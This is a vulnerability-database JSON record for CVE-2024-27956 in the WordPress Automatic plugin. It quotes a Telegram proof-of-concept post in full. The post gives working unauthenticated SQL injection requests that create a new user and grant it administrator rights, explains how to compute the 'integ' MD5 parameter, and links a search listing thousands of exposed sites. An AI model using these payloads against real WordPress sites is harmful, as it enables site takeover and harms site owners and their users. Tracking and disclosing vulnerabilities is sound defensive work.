{"uuid": "2aa4e3e0-bfb2-490f-aa1d-b6099fd5a407", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-27956", "type": "published-proof-of-concept", "source": "https://t.me/paiddpam/2939", "content": "\ud83d\udc69\u200d\ud83d\udcbb PoC for WordPress Automatic Plugin CVE-2024-27956 (Unauthenticated Arbitrary SQL Execution) (CVSS 9.9)\n\nSince \"q\" is passed directly into a $wpdb->get_results() call, you can execute SQL commands directly. \n\nAdding a new WordPress user:\nq=INSERT INTO wp_users (user_login, user_pass, user_nicename, user_email, user_registered, user_status) VALUES ('poc', MD5('poc'), 'poc', 'poc@localhost.org', NOW(), 0);&auth=%20&integ=5be638728303f002fd54450e5866dd28\nGiving the user admin rights:\nq=INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES (6, 'wp_capabilities', 'a:1:{s:13:\"administrator\";b:1;}'), (6, 'wp_user_level', '10');&auth=%20&integ=6ed26ea278413ec91e2c27fed01eac6c\nPWNED!\n\nNote: Param \"integ\" is the md5sum of the query.\n\n6K+ Services are found: https://hunter.how/list?searchValue=web.body%3D%22wp-content%2Fplugins%2Fwp-automatic%22\n\nTweet: https://x.com/mrtuxracer/status/1784229071460692232?s=12", "creation_timestamp": "2024-06-13T06:56:04.000000Z"}